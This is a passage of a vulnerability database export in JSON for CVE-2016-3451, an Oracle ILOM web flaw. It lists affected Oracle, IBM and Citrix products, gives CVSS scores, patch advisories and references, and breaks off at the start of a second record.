"10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003866", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, ], trust: 0.6, }, cve: "CVE-2016-3451", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2016-3451", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-92270", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 4.7, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 2.8, id: "CVE-2016-3451", impactScore: 1.4, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1.8, userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3451", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2016-3451", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201607-660", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-92270", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-3451", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'HTTP' protocol. The 'Web' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. A remote attacker could exploit this vulnerability to update, insert, or delete data, affecting data integrity", sources: [ { db: "NVD", id: "CVE-2016-3451", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-3451", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "92022", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003866", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-660", trust: 0.7, }, { db: "VULHUB", id: "VHN-92270", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-3451", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, id: "VAR-201607-0587", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-92270", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:32:31.790000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63020", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3451", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-3451", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/92022", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3451", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3451", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-92270", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-3451", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92022", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003866", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-660", }, { date: "2016-07-21T10:12:15.067000", db: "NVD", id: "CVE-2016-3451", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-92270", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-3451", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92022", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003866", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-660", }, { date: "2024-11-21T02:50:02.070000", db: "NVD", id: "CVE-2016-3451", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Web Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003866", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, ], trust: 0.6, }, }
var-201607-0652
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile 